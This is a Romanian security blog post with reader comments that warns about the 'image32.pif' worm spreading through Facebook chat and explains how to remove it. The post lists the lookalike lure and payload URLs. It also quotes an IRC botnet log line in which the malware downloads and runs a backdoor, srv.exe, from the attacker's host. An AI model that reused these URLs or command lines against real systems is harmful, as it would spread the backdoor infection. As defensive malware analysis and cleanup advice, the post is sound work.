[Solutie] Virusul “image32.pif” se raspandeste pe Facebook

Se raspandeste pe facebook un nou virus, propagat prin intermediul chat-ului.
Link-ul primit este urmatorul:

http://img22.lmagefinder.com/img/index.php?id=image64.jpg

Dand click, victima este redirectionata spre http://www.lmageshare.com/images/image32.pif, fisierul pif fiind de tip executabil, infectand PC-ul in momentul rularii.

Detectia sa este una medie pe VirusTotal: 18 din 43 de Antivirusi.

Ce face acest malware?
Creeaza fisierul %AppData%\Ocxaxo.exe, ruleaza automat la pornirea Windows-ului, trimite mesaje prietenilor pe Facebook si incearca mai multe conexiuni spre cateva IP-uri si o conexiune de tip IRC, prin care descarca malware aditional in PC-ul victimei:

NICK n{US|XPa}dyrzbvn
USER dyrzbvn 0 0 :dyrzbvn
JOIN #ngr ngrbot
PRIVMSG #ngr :[d=”http://lmageshare.com/srv.exe” s=”124928 bytes”] Executed file “C:\Documents and Settings\UserName\Application Data\2.exe” – Download retries: 0

Acest fisier (srv.exe) este un Backdoor si are o detectie de doar 11 din 43 Antivirusi pe VirusTotal.com.

Daca l-ati rulat, iata solutiile pentru DEVIRUSARE:

1. Descarcati Malwarebytes Anti-Malware. Scanati PC-ul rapid (sau complet daca nu functioneaza scanarea rapida) si stergeti la final infectiile gasite apasand Remove selected.

2.Descarcati Dr.Web Cureit! si scanati PC-ul:
http://www.freedrweb.com/cureit/?lng=en

Administrator FaraVirusi.com
voluntar al Comodo Malware Research Team, expert Malwarebytes Anti-Malware

8 responses to “[Solutie] Virusul “image32.pif” se raspandeste pe Facebook”

  1. nork

    Din cate mi-a spus prietena mea care mi-l tot trimite cand vorbim pe chat, nu poate accesa paginile oficiale ale celor de la avira, bitdefender, eset, kaspersky, nu poate face nici update la malwarebytes si nici nu poate accesa pagina de pe facebook a aplicatiei Bitdefender Safego…

  2. asparagus

    o întrebare. avira mi-a semnalat dintr-o data ca am un virus, ‘TR/Spy.463227 in sistem si mi-a prezentat solutia carantinei. cum nu navigam pe nici un site suspect, am cerut mai multe detalii si in explicatii am gasit ca acesta este o alarma falsa, pe care o pot indrepta cu un update. am dat ignore deci ,presupusului virus si am updatat produsul. am facut bine ?

  3. nork

    Multumesc pentru sfat!

  4. Ionut

    Al dracu virus. L-am luat si eu sa il testez si din cate se pare face parte din familia zbot ce contine si un mod de autoascundere in memorie si ca sa fie treaba smecheroasa nu se vede nici la startup.
    Pentru o devirusare manual de succes eu apela la metoda cealalta:
    – disable la cheile de startup din registri
    – restart
    – stergerea executabilelor din C:\Documents and Settings\UserName\Application Data\

    PS: Radu vezi ca in calea de mai sus sunt 2 virusi:
    ocifra.exe
    si
    adkckc.exe – invisibil chiar si la comanda: dir /a

  5. mirel

    Când anunțați câștigătorii la concursul Kaspersky azi este 26!?

Leave a Reply